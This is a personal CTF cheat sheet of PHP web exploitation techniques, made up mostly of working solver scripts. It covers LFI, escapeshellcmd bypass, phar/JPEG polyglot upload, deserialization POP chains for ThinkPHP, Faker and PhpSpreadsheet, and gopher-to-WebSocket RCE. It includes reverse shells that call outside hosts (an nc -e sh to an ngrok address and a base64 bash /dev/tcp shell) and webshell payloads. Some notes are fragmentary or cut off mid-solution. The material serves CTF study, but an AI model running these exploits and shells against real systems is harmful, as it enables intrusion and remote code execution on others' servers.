    
    if ord(j) ^ ord(k) ^ ord(l) ^ ord(m) ^ ord(n) ^ ord(o) ^ ord(p) == ord(s):
    
    return ".('%s'^'%s'^'%s'^'%s'^'%s'^'%s'^'%s')" % (escape_char(j), escape_char(k), escape_char(l), escape_char(m), escape_char(n), escape_char(o), escape_char(p))
    
    
    
    
    return False
    
    
    
    for code in string_code:
    
    obfuscated = ""
    
    for i in code:
    
    tmp = search(i)
    
    if not tmp:
    
    obfuscated += ".'%s'" % i
    
    else:
    
    obfuscated += tmp
    
    obfuscated_code += "(%s)" % obfuscated[1:]
    
    print(''.join(["(\\"%s\\")" % i for i in string_code]) + '=' + obfuscated_code)
    

    PHP xor bin without ' and "

    <?php
    
    function get_xor($str){
        for ($i = 10; $i < 99; $i++) {
            for ($j = 10; $j < 99; $j++) {
                if ((hex2bin(strval($j)) ^ hex2bin(strval($i))) === $str) {
                    return [$j, $i];
                }
            }
        }
        return false;
    }
    
    function get_xor_str($str){
        $result = [];
    
        foreach (str_split($str) as $char) {
            $result[] = get_xor($char);
        }
    
        return $result;
    }
    
    function get_xor_joined($str){
        $result = "join(hex2bin(00),[";
        $arrxor = get_xor_str($str);
    
        foreach ($arrxor as $ab){
            $a = $ab[0];
            $b = $ab[1];
            $result .= "hex2bin($a)^hex2bin($b),";
        }
    
        $result = rtrim($result, ',') . "])";
    
        return $result;
    }
    
    $inputString = "ls /";
    echo get_xor_joined($inputString)."\\n";
    
    

    preg_match

    there's special case where we can make preg_match("/([^a-z])+/s", $input) to outputing false.

    in this case we need to add "A"*9000 to make it return false

    https://hackmd.io/@abdinata/Website-Challenge-0xL4ughCTF-2024#Simple-WAF

    https://www.php.net/manual/en/function.include.php

    It is also able to include or open a file from a zip file:
    <?php
    include "something.zip#script.php";
    echo file_get_contents("something.zip#script.php");
    ?>
    Note that instead of using / or \\, open a file from a zip file uses # to separate zip name and inner file's name.
    

    Error based full path leak using long filename

    WolvCTF 2024

    import re
    import httpx
    
    URL = "<https://upload-fun-okntin33tq-ul.a.run.app/>"
    # URL = "<http://0:5500/>"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.Client(base_url=url)
        def f(self, f):
            return self.c.get("/", params={"f":f})
        def upload(self, f):
            return self.c.post("/", files={"f":f,"f":f})
    
    class API(BaseAPI):
        ...
    
    if __name__ == "__main__":
        api = API()
        res = api.upload(("a"*1000000, "x"))
        uppath = re.search(r"(?<=\\./uploads/).*?(?=_)", res.text).group(0)
        res = api.upload(("x", "<?=system('cat /flag*')?>"))
        res = api.f(uppath+"_x")
        print(res.text)
    
    

    Bypass require_once / include_once

    ACSC quals 2024 challenge DB Explorer

    solver

    import httpx
    
    # URL = "http://localhost:9000"
    URL = "http://db-exp.vuln.live/"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.Client(base_url=url)
    
    class API(BaseAPI):
        ...
    
    if __name__ == "__main__":
        while True:
            api = API()
            res = api.c.post("/index.php?normal=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/level_checker&admin=/var/lib/mysql/ibtmp1", data={"normal":"x"},headers={"Host": "admin.pepe"})
            if "dimasmaulana" in res.text:
                print(res.text.replace("\x00", "").encode().replace(b"\xef\xbf\xbd", b""))
    
    """
    copas terus menerus di phpmyadmin
    
    CREATE TEMPORARY TABLE temp (
        x BLOB
    );
    INSERT INTO temp (x) VALUES
    (CONCAT("dimasmaulana","<?=system('/flag');?>"));
    """

    Using symlink multiple times can allow us to include a file multiple times even when using include_once. This happens because PHP does not check for a file if there are many symlinks.

    LFI to rce if nginx exist and we can’t use protocol

    0xbb - PHP LFI with Nginx Assistance (bierbaumer.net)

    PHP Filter after check

    ref: tamuctf 2024 challenge Remote

    FILTER_SANITIZE_URL will sanitize and remove all special character that’s not part of filename, so we can do some bypass

    if(!preg_match("/(htm)|(php)|(js)|(css)/", $_REQUEST['url'])) {
      $url = filter_var($_REQUEST['url'], FILTER_SANITIZE_URL);

    ex using newline:

    import asyncio
    import httpx
    from pyngrok import ngrok
    from flask import Flask
    from threading import Thread
    from bs4 import BeautifulSoup
    
    PORT = 6666
    TUNNEL = ngrok.connect(PORT, "http").public_url
    
    print("TUNNEL:", TUNNEL)
    
    URL = "https://remote.tamuctf.com/"
    # URL = "http://localhost:8080/"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.Client(base_url=url, timeout=9999)
        def upload(self, url):
            return self.c.post("/index.php", data={"url": url})
        def uplaod_file(self, files, data):
            return self.c.post("/index.php", files=files, data=data)
        def home(self):
            return self.c.get("/")
    
    class API(BaseAPI):
        ...
    
    def webServer(pathname):
        app = Flask(__name__)
        @app.get(f"/{pathname}")
        def home():
            return "<?php system($_GET['dimas']);?>"
        return Thread(target=app.run, args=('0.0.0.0', PORT))
    
    
    
    async def main():
        api = API()
        pathname = "index.php"
        server = webServer(pathname)
        server.start()
        await asyncio.sleep(1)
        # api.c.cookies.set("PHPSESSID", "")
        res = api.upload(f"{TUNNEL}/index.ph\np")
        phpsessid = api.c.cookies['PHPSESSID']
        root = BeautifulSoup(res.text, features="html.parser")
        print(f"{URL}/uploads/{phpsessid}/{root.find_all('a').pop().get_attribute_list('href')[0].split('=')[1]}")
        server.join()
    
    if __name__ == "__main__":
        asyncio.run(main())
    

    the code:

    <?php
      } else if(isset($_REQUEST['url'])) {
        if(!preg_match("/(htm)|(php)|(js)|(css)/", $_REQUEST['url'])) {
          $url = filter_var($_REQUEST['url'], FILTER_SANITIZE_URL);
          if(filter_var($url, FILTER_VALIDATE_URL)) {
            $img = file_get_contents($url);
            if($img !== false) {
              $mime = substr($url, strrpos($url, '.') + 1);
              $file = random_filename(32, 'uploads/' . $sess, $mime);
    
              $f = fopen('uploads/' . $sess . '/' . $file, "wb");
              if($f !== false) {
                fwrite($f, $img);
                fclose($f);
                

    New 2 PHP Trick from b01lers CTF 2024 challenge

    web/library_of_<?php

    import httpx
    import re
    URL = "http://192.168.183.138:4444"
    # URL = "https://libraryofphp-c20d084bfc71e709.instancer.b01lersc.tf/"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.Client(base_url=url)
        def index(self, q):
            return self.c.post("/index.php", data={
                "q": q,
            })
        def search(self, s, securify, d):
            return self.c.get("/search.php", params={
                "s": s,
                "securify": securify,
                "d": d,
            })
    class API(BaseAPI):
        ...
    
    if __name__ == "__main__":
        api = API()
        # PHPSESSID perlu diberikan nullbyte agar php menghiraukan text setelah nullbyte, setelah itu
        # kita berikan nullbyte agar PHPSESSID tidak membaca string setelah nullbyte, ini akan membuat session menjadi invalid
        api.c.cookies.set("PHPSESSID", "mysecretsession%00a<?=/*")
        # set username "" agar program menggunakna 6 byte terakhir dari PHPSESSID
        api.c.cookies.set("username", "")
        # payload kita
        res = api.index(
            q="*/`ls`; //aaax",
        )
        print(res.text)
        id = re.search('(?<=">).*?(?=</a><br>)', res.text).group(0)
    
        res = api.c.get("/search.php?s="+id)
        print(res.text)
        res = api.search(
            s=id,
            # hash sha256 dari string "INF"
            securify="121b078c0b324860d916f4c10d6dc96ebc4885035ea6fbd75f78de5a3d9f8c41",
            # dengan menginputkan 1e1000 kita akan merubah hasil dari `$d + rand(0, getrandmax())` menjadi
            # string INF di PHP
            # jadi:
            # $d + rand(0, getrandmax()) === INF
            # hash('sha256', $d + rand(0, getrandmax())) === "121b078c0b324860d916f4c10d6dc96ebc4885035ea6fbd75f78de5a3d9f8c41"
            # membypass ini akan memberikan kita akses ke 'include'
            d="1e1000"
        )
        print(res.text)
    

    Bypass sha using INF obj

    SHA treats 1e1000+ rand(0, getrandmax()) as INF. When hashing this argument, the program interprets it as a string. Therefore, the result will be the SHA-256 hash of the string "INF".

    PHP will not read id of PHPSESSID after %00

    In this case, the PHP session algorithm will ignore the string after %00: api.c.cookies.set("PHPSESSID", "mysecretsession%00a<?=/*").

    If short_open_tag enabled

    b01lers CTF 2024 challenge library_of_<?php

    if short_open_tag enabled in php.ini we can do something like this

    <?1 system($_GET['x']);

    Bypass escapeshellcmd

    midight-sun-2024/awkw4ard

    If there’s something like this, we can inject a space into the escapeshellcmd, and it will not be sanitized

    $iface = escapeshellcmd($_POST['interface']);
    exec("iw dev | awk -v iface=".$iface." '/^phy#/ { phy = $0 } $1 == \"Interface\" { interface = $2 } interface == iface { print phy }'", $return);
    
     <?php
    
        /*
        FROM php:8.3-fpm-alpine3.19
        RUN adduser -D -H -s /sbin/nologin pleb
        [...]
        USER pleb
        CMD ["php-fpm"]
        */
    
            ini_set("display_errors", TRUE);
            error_reporting(E_ALL);
    
    
        ?>
    
          <div class="bg-inside">
          </div>
        </div>
    
        <?php
    
          if(!isset($_POST['interface'])){
            highlight_file($_SERVER['SCRIPT_FILENAME']);
            exit();
          }
    
            $iface = escapeshellcmd($_POST['interface']);
            exec("iw dev | awk -v iface=".$iface." '/^phy#/ { phy = $0 } $1 == \"Interface\" { interface = $2 } interface == iface { print phy }'", $return);
            $phy = $return[0];
            exec('iw '.$phy.' info', $info);
        echo "<pre>" . $info[0] . "</pre>\n";
    
    ?>
    

    solve

    import httpx
    
    URL = "http://awkw4ard-1.play.hfsc.tf/"
    # URL = "http://localhost:4444/"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.Client(base_url=url, timeout=999)
        def interface(self, interface):
            return self.c.post("/", data={"interface": interface})
    
    class API(BaseAPI):
        ...
    
    if __name__ == "__main__":
        api = API()
        res = api.interface("nc${IFS}0.tcp.ngrok.io${IFS}17197${IFS}-e${IFS}sh {}BEGIN{system(iface)}#")
        print(res.text)
    

    symlink trick if there’s blocked function

    sasctf-quals-2024/tasks/web-binary-options/writeup/exploit.py at main · Team-Drovosec/sasctf-quals-2024 (github.com)

    param_payload = ".ini_set('display_errors', 1).symlink($_FILES['file']['tmp_name'], '/var/www/html/file.shtml').virtual('file.shtml').die()."

    PHP Trick Using FIle Upload if File Upload is Restricted to Non PHP File Type Like PNG or JPEG

    CODEGATE 2024

    vulnerable code

    related: business-ctf-2024/web/[Medium] Magicom at main · hackthebox/business-ctf-2024 (github.com)

    $poll_skin_path = "$g4[path]/skin/poll/$skin_dir";
    if (!file_exists("$poll_skin_path/poll_result.skin.php")) die("skin error");
    include_once ("$poll_skin_path/poll_result.skin.php");
    
  • misal $g4[path]=phar:/ dan $skin_dir=../../[path ke gambar]/gambar.jpg/poll_result.skin.php
  • 2024-06-02T09:28:00.000+08:002024-06-02T09:28:00.000+08:002024-06-02T09:28:00.000+08:00

      entar dia include phar://skin/poll/../../[path ke gambar]/gambar.jpg/poll_result.skin.php

  • 2024-06-02T09:28:00.000+08:002024-06-02T09:28:00.000+08:002024-06-02T09:28:00.000+08:00

      anjir gampang

  • import httpx
    import base64
    import hashlib
    import os
    URL = "http://13.125.178.249/"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.Client(base_url=url)
        def config(self, g4_path):
            return self.c.post("/cheditor5/imageUpload/_config.php", data={"_SERVER[g4_path]": g4_path})
        def upload(self, file):
            return self.c.post("/cheditor5/imageUpload/upload.php", files={"file": file})
        def index(self, sst):
            return self.c.post("/adm/index.php", data={
                "sst": sst,
                "_SERVER[g4_path]": "x",
            })
        def version(self, g4_path, ):
            return self.c.post("/adm/version.php", data={
                "_SERVER[g4_path]": g4_path,
                "sub_menu": "0",
                "auth[0]": "r",
                "_SERVER[SERVER_ADDR]": "a",
                "_SERVER[REMOTE_ADDR]": "a",
                "_SERVER[HTTP_USER_AGENT]": "a",
                }, cookies={
                    hashlib.md5(b"ck_mb_id").hexdigest(): base64.b64encode(b"admin").decode(),
                    hashlib.md5(b"ck_auto").hexdigest(): base64.b64encode(b"47bce5c74f589f4867dbd57e9ca9f808").decode()
                })
        def poll_result(self, filePath):
            return self.c.post("/bbs/poll_result.php", data={
                "skin_dir": filePath,
                "_SERVER[g4_path]": "phar:/",
                "po_id": 1,
            })
    
    class API(BaseAPI):
        ...
    with open("payload.php", "wb") as f:
        payload = r"""<?php
    $jpeg_header_size =
    "\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\x01\x01\x00\x48\x00\x48\x00\x00\xff\xfe\x00\x13".
    "\x43\x72\x65\x61\x74\x65\x64\x20\x77\x69\x74\x68\x20\x47\x49\x4d\x50\xff\xdb\x00\x43\x00\x03\x02".
    "\x02\x03\x02\x02\x03\x03\x03\x03\x04\x03\x03\x04\x05\x08\x05\x05\x04\x04\x05\x0a\x07\x07\x06\x08\x0c\x0a\x0c\x0c\x0b\x0a\x0b\x0b\x0d\x0e\x12\x10\x0d\x0e\x11\x0e\x0b\x0b\x10\x16\x10\x11\x13\x14\x15\x15".
    "\x15\x0c\x0f\x17\x18\x16\x14\x18\x12\x14\x15\x14\xff\xdb\x00\x43\x01\x03\x04\x04\x05\x04\x05\x09\x05\x05\x09\x14\x0d\x0b\x0d\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14".
    "\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\xff\xc2\x00\x11\x08\x00\x0a\x00\x0a\x03\x01\x11\x00\x02\x11\x01\x03\x11\x01".
    "\xff\xc4\x00\x15\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xc4\x00\x14\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xda\x00\x0c\x03".
    "\x01\x00\x02\x10\x03\x10\x00\x00\x01\x95\x00\x07\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x05\x02\x1f\xff\xc4\x00\x14\x11".
    "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x03\x01\x01\x3f\x01\x1f\xff\xc4\x00\x14\x11\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20".
    "\xff\xda\x00\x08\x01\x02\x01\x01\x3f\x01\x1f\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x06\x3f\x02\x1f\xff\xc4\x00\x14\x10\x01".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x3f\x21\x1f\xff\xda\x00\x0c\x03\x01\x00\x02\x00\x03\x00\x00\x00\x10\x92\x4f\xff\xc4\x00\x14\x11\x01\x00".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x03\x01\x01\x3f\x10\x1f\xff\xc4\x00\x14\x11\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda".
    "\x00\x08\x01\x02\x01\x01\x3f\x10\x1f\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x3f\x10\x1f\xff\xd9";
    
    $phar = new Phar('payload.phar');
    $phar->startBuffering();
    $phar->addFromString('poll_result.skin.php', '<?php system("cat /f*"); ?>');
    $phar->setStub($jpeg_header_size."\n<?php __HALT_COMPILER(); ?>");
    $phar->stopBuffering();"""
        f.write(payload.encode())
    
    os.system("php --define phar.readonly=0 payload.php")
    
    
    if __name__ == "__main__":
        api = API()
        res = api.config("../../bbs/skin/poll/")
        print(res.text)
        res = api.upload(("payload.png", open("payload.phar", "rb").read()))
        filePath = res.json()["filePath"].split("/../")[-1]
        res = api.poll_result("../../../"+filePath)
        print(res.text)
    
     

    PHP Deserialization Trick Using Call

    so if the method not found inside a class the __call will be invoked

    example challenge:

    8TH XCTF Finals

    Solver

    <?php
    
    namespace think\route {
        class ResourceRegister
        {
            public $resource;
            public function __construct($resource)
            {
                $this->resource = $resource;
            }
        }
        abstract class Rule
        {
            public $rest = ['key' => [1 => '<id>']];
            public $name = "name";
            public $rule;
            public $router;
            public $option;
            public function __construct($rule, $router, $option)
            {
                $this->rule = $rule;
                $this->router = $router;
                $this->option = ['var' => ['nivia' => $option]];
            }
        }
        class RuleGroup extends Rule
        {
            public function __construct($rule, $router, $option)
            {
                parent::__construct($rule, $router, $option);
            }
    
        }
    
        class Resource extends RuleGroup
        {
            public function __construct($rule, $router, $option)
            {
                parent::__construct($rule, $router, $option);
            }
        }
    }
    namespace think {
        class Route
        {
        }
        abstract class Model
        {
            private $relation;
            protected $append = ['Nivia' => "1.2"];
            protected $visible;
            public function __construct($visible, $call)
            {
                $this->visible = [1 => $visible];
                $this->relation = ['1' => $call];
            }
        }
        class Validate
        {
            protected $type;
            public function __construct()
            {
                $this->type = ['visible' => "system"];//function
            }
        }
    }
    namespace think\model {
        use think\Model;
    
        class Pivot extends Model
        {
            public function __construct($visible, $call)
            {
                parent::__construct($visible, $call);
            }
        }
    }
    namespace Symfony\Component\VarDumper\Caster {
        use Symfony\Component\VarDumper\Cloner\Stub;
    
        class ConstStub extends Stub
        {
        }
    }
    namespace Symfony\Component\VarDumper\Cloner {
        class Stub
        {
            public $value = "google-chrome"; //cmd
        }
    }
    namespace {
        $call = new think\Validate;
        $option = new think\model\Pivot(new Symfony\Component\VarDumper\Caster\ConstStub, $call);
        $router = new think\Route;
        $resource = new think\route\Resource("abc.nivia", $router, $option);
        $resourceRegister = new think\route\ResourceRegister($resource);
        echo base64_encode(serialize($resourceRegister));
    }

    without syhmfony to string

    <?php
    
    namespace think\route {
        class ResourceRegister
        {
            public $resource;
            public function __construct($resource)
            {
                $this->resource = $resource;
            }
        }
        abstract class Rule
        {
            public $rest = ['key' => [1 => '<id>']];
            public $name = "name";
            public $rule;
            public $router;
            public $option;
            public function __construct($rule, $router, $option)
            {
                $this->rule = $rule;
                $this->router = $router;
                $this->option = ['var' => ['nivia' => $option]];
            }
        }
        class RuleGroup extends Rule
        {
            public function __construct($rule, $router, $option)
            {
                parent::__construct($rule, $router, $option);
            }
    
        }
    
        class Resource extends RuleGroup
        {
            public function __construct($rule, $router, $option)
            {
                parent::__construct($rule, $router, $option);
            }
        }
    }
    namespace think {
        class Route
        {
        }
        abstract class Model
        {
            private $relation;
            protected $append = ['Nivia' => "1.2"];
            protected $visible;
            public function __construct($visible, $call)
            {
                $this->visible = [1 => $visible];
                $this->relation = ['1' => $call];
            }
        }
        class Validate
        {
            protected $type;
            public function __construct()
            {
                $this->type = ['visible' => "system"];//function
            }
        }
    }
    namespace think\model {
        use think\Model;
    
        class Pivot extends Model
        {
            public function __construct($visible, $call)
            {
                parent::__construct($visible, $call);
            }
        }
    }
    
    namespace {
        $call = new think\Validate;
        $option = new think\model\Pivot(new Error("\ngoogle-chrome\n"), $call);
        $router = new think\Route;
        $resource = new think\route\Resource("abc.nivia", $router, $option); //trigger to string in Pivot
        $resourceRegister = new think\route\ResourceRegister($resource);
        echo base64_encode(serialize($resourceRegister));
    }
    

    Kurang lebih exploitasinya disimplified menjadi seperti ini

    <?php
    namespace will\you\call\me {
        class CallMe
        {
            private function pleaseCallMe($val, $key)
            {
                return call_user_func($val, $key);
            }
            public function __call($method, $args)
            {
                return call_user_func_array($method, $args);
            }
        }
    }
    
    namespace iam\noone {
        class Noone
        {
            public function nobody($cash)
            {
                echo "thanks for your cash $cash";
            }
        }
    }
    
    namespace world\will\call\me {
        use iam\noone\Noone;
    
        class StrongestSorcerer
        {
            private Noone $callMe;
            private $cash = 0;
            public function __tostring()
            {
                if (isset($this->callMe)) {
                    if (is_string($this->callMe)) {
                    } else {
                        $this->callMe->nobody($this->cash);
                    }
                }
                return "World strongest sorcerer";
            }
        }
    }
    
    namespace because\iam\strong\after\all {
        abstract class DomainExpansion
        {
            protected $domain;
            protected $juliet;
        }
    }
    
    namespace idwin\really\idwillwin {
        use because\iam\strong\after\all\DomainExpansion;
    
        class Stringify extends DomainExpansion
        {
            public $romeo;
            private function IamString($s)
            {
                if ($this->juliet == $this->romeo){
                    return "$s";
                }
            }
            public function __destruct()
            {
                $this->romeo = random_bytes(100);
                $this->IamString($this->domain);
            }
        }
    }
    
    namespace {
        if (isset($_GET['ops']) && isset($_REQUEST['ops'])) {
            if ($_GET['ops'] != $_REQUEST['ops']) {
                unserialize($_REQUEST['ops']);
            }
        }
        highlight_file(__FILE__);
    }

    Date function xss

    date('<\i\m\g \s\r\c=\x \o\n\e\r\r\o\r=\a\l\e\r\t(1)>');

    PHP file execution throught cve and send WebSocket using gopher

    8TH XCTF Final

    PHP Development Server <= 7.4.21 - Remote Source Disclosure (projectdiscovery.io)

    import bitstruct
    import requests
    import json
    
    base = 'http://172.22.177.166:64000'
    proxy = f'{base}/proxy_v2.dev.php'
    
    def get_id():
        data = {'uri': 'http://127.0.0.1:9229/json'}
        r = requests.post(proxy, data=data)
        return r.json()[0]['id']
    
    def get_mtu():
        data = {'uri': 'file:///sys/class/net/lo/mtu'}
        r = requests.post(proxy, data=data)
        return int(r.text)
    
    def read(uri):
        data = {'uri': uri}
        r = requests.post(proxy, data=data)
        return r.text
    
    def make_req(_req):
        return ('\r\n'.join(_req) + '\r\n\r\n').encode()
    
    def enc(data):
        r = ''
        for i in data:
            r += '%' + hex(i)[2:].zfill(2)
        return r
    
    def make_gopher(ip, port, data):
        assert b'\x00' not in data
        return f'gopher://{ip}:{port}/_{enc(data)}'
    
    def make_websocket_text_frame(data):
        assert 126 <= len(data) < 2 ** 16
        pkt = bytearray()
        FIN, RSV, OPCODE, MASK, PAYLOAD_LEN = 1, 0, 1, 1, 126
        EXTENDED_PAYLOAD_LEN = len(data)
        MASK_KEY = b'\xfe\xfe\xfe\xfe'
        MASKED_DATA = bytearray(data)
        for i in range(len(MASKED_DATA)):
            MASKED_DATA[i] = MASKED_DATA[i] ^ MASK_KEY[i % 4]
        pkt += bitstruct.pack('>u1u3u4u1u7u16r32', FIN, RSV, OPCODE, MASK,
            PAYLOAD_LEN, EXTENDED_PAYLOAD_LEN, MASK_KEY)
        pkt += MASKED_DATA
        return pkt
    
    _id = get_id()
    mtu = get_mtu()
    req = make_req([
        f'GET /{_id} HTTP/1.1',
        'Sec-WebSocket-Version: 13',
        'Sec-WebSocket-Key: NMtM5Mt1C7TYIF3JMw9G8w==',
        'Connection: Upgrade',
        'Upgrade: websocket',
        'Content-Length: 0',
        'Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits',
        'Host: 127.0.0.1:9229'
    ])
    
    empty_text_frame = bytes.fromhex('818081808180')
    padding_len = 0x50
    cmd = 'echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMDEuMjAwLjIwMi4yMTYvNjUwMDEgMD4mMQ== | base64 -d | bash'
    express = f'require("child_process").execSync("{cmd}");//{"A" * padding_len}'
    exp = {
        "id": 1,
        "method": "Runtime.evaluate",
        "params": {
            "expression": express,
            "includeCommandLineAPI": True
        }
    }
    exp_text_frame = make_websocket_text_frame(json.dumps(exp).encode())
    payload = req + b'A' * (mtu - len(req)) + exp_text_frame
    
    print(read(make_gopher('127.0.0.1', 9229, payload)))
    

    Misconfiguration like this can lead to arbitary php file include

    tested in

    FROM php:7.4-apache
    
    RUN a2enmod rewrite
    COPY ./src/default.conf /etc/apache2/sites-available/000-default.conf
    COPY ./src/ /var/www/html/
    <VirtualHost *:80>
            <Directory />
                    Require all granted
            </Directory>
    
            ServerAdmin webmaster@localhost
            LogLevel alert rewrite:trace3
            DocumentRoot /var/www/html/
    
            ErrorLog ${APACHE_LOG_DIR}/error.log
            CustomLog ${APACHE_LOG_DIR}/access.log combined
    
            RewriteEngine On
            RewriteRule  ^/(.*)/$ /$1.html
    </VirtualHost>
    

    poc

    http://localhost/usr/local/lib/php/peclcmd.php%3f/

    reference from SCTF 2024 By W&M - W&M Team (wm-team.cn) chall havefun

    Deserialization + File upload if FileCookieJar exist

    https://blog.wm-team.cn/index.php/archives/82/#Simpleshop

    require __DIR__ . '/vendor/autoload.php';use GuzzleHttp\Cookie\FileCookieJar;use GuzzleHttp\Cookie\SetCookie;$obj = new FileCookieJar('public/shell.php');$payload = '<?php eval(filter_input(INPUT_POST,a)); ?>';$obj->setCookie(new SetCookie([    'Name' => 'foo',"Value"=>"1",    'Domain' => $payload,    "a"=> 'bar',    'Expires' => time()]));$phar = new \Phar("1.phar");$phar->startBuffering();$phar->setStub('GIF89a'."__HALT_COMPILER();");$phar->setMetadata($obj);$phar->addFromString("test.txt", "test");$phar->stopBuffering();?>

    XSS in 302 redirect

    Forcing Firefox to Execute XSS Payloads during 302 Redirects | Gremwell

    Some Faker __call chain

    my writeup Exploitation

    other

    PHP POP Chain

    o-o.ee/Patchstack-Alliance-CTF-S01E01/#h.otluyykmfb7g

    Our entrypoint is in \PhpOffice\PhpSpreadsheet\Collection\Cells class

    public function __destruct(){
    
       $this->cache->deleteMultiple($this->getAllCacheKeys());
    
    }

    That might allow us controlling an arbitrary middle object, but alas, this is not the case this time.

    Next we have the getAllCacheKeys() method call, that

    private function getAllCacheKeys(){
    
       $keys = [];
    
       foreach ($this->index as $coordinate => $value) {
    
           $keys[] = $this->cachePrefix . $coordinate;
    
       }
    
       return implode(',', $keys);
    
    }

    Allows us getting a __toString() call on the $this->cachePrefix object

    Setting the cachePrefix to \PhpOffice\PhpSpreadsheet\Comment instance

    public function __toString(): string {
    
       return $this->text->getPlainText();
    
    }

    This allows us another call (now looking at it, this might have been maybe possible already on the previous step… oh-well, not going back to test now 😁)

    Anyway, setting the text parameter to \Faker\ValidGenerator, we reach this super cool (and from defender's perspective super dangerous) function, that triggers, whenever the object is missing the method to handle the call.

    Luckily, the ValidGenerator doesn't implement a function getPlainText, so we're good.

    public function __call($name, $arguments){
    
       $i = 0;
    
       do {
    
           $res = call_user_func_array([$this->generator, $name], $arguments);
    
           ++$i;
    
    
           if ($i > $this->maxRetries) {
    
               throw new \OverflowException(sprintf('Maximum retries of %d reached without finding a valid value', $this->maxRetries));
    
           }
    
       } while (!call_user_func($this->validator, $res));
    
    
       return $res;
    
    }
    
    

    Next we need to somehow control the function and argument, which we can do if we set the generator and validator

    We can achieve our code execution via the

    (!call_user_func($this->validator, $res));

    Because the validator parameter we can control. Next we need few more things. We need to reach the block without throwing an error, which means that something needs to receive the getPlainText call and answer without failing. Bypassing the maxRetries is trivial, since we control the parameter. Further, since the validator gets the same $res parameter as the argument, we need to also control the output of

    call_user_func_array([$this->generator, 'getPlainText']

    Luckily, the Faker has another trick in our favour -> \Faker\DefaultGenerator that has

    public function __call($method, $attributes)
    {
       return $this->default;
    }

    I have discovered, that is useful to have the "Faked" classes and "Original" classes side-by-side. Given that the serialized output is a string, I can simply do some string replacements to be able to target the original classes (obviously I cannot use Maker and ShpOffice anywhere else in the payload) 🤷

    This is

    <?php
    
    
    namespace Maker {
    
     class DefaultGenerator {
    
       private $default;
    
       function __construct() {
    
         $this->default = 'cat /*.txt'; // Argument
    
       }
    
     }
    
     class ValidGenerator {
    
       private $generator;
    
       private $validator;
    
       private $formatters;
    
       private $maxRetries;
    
       function __construct() {
    
         $this->generator = new \Maker\DefaultGenerator();
    
         $this->validator = 'passthru'; // Function
    
         $this->maxRetries = 2;
    
       }
    
     }
    
    }
    
    
    namespace ShpOffice\PhpSpreadsheet\Collection\Memory {
    
     class SimpleCache3 {
    
     }
    
    }
    
    
    namespace ShpOffice\PhpSpreadsheet\Worksheet\Worksheet{
    
     class Worksheet{
    
       private $parent;
    
       function __construct() {
    
       }
    
     }
    
    }
    
    
    namespace ShpOffice\PhpSpreadsheet {
    
     class Comment {
    
       public $text;
    
       function __construct() {
    
         $this->text = new \Maker\ValidGenerator();;
    
       }
    
     }
    
    }
    
    
    
    namespace ShpOffice\PhpSpreadsheet\Collection{
    
     class Cells{
    
       private $parent;
    
       private $cache;
    
       private $index;
    
       private $cachePrefix;
    
       function __construct() {
    
         $this->parent = new \ShpOffice\PhpSpreadsheet\Worksheet\Worksheet\Worksheet();
    
         $this->cache = new \ShpOffice\PhpSpreadsheet\Collection\Memory\SimpleCache3();
    
         $this->cachePrefix = new \ShpOffice\PhpSpreadsheet\Comment();
    
         $this->index = [
    
           'a' => 'b'
    
         ];
    
       }
    
     }
    
    }
    
    
    namespace {
    
     echo "POP chain\n\n";
    
     $part = new \ShpOffice\PhpSpreadsheet\Collection\Cells();
    
     $serialized = (serialize($part));
    
     $serialized = str_replace('Maker', 'Faker', $serialized);
    
     $serialized = str_replace('ShpOffice', 'PhpOffice', $serialized);
    
     echo urlencode($serialized);
    
     // unserialize($serialized);
    
     die("\n\nEND");

    author

    I wonder if you have found the itended chain for the donor challenge yet? And here is my solution

    import re

    session = requests.session()

    def get_cookies(url):

    def find_flag_filename(cookies,url):

    def get_flag_content(cookies, flag_filename,url):

    def main():

    if name == "main":

    Of course, it needs to be changed a bit to match the pachstack team's flag structure

    <@663394727688798231> <@658787334984171539>

    # PHP request smugling
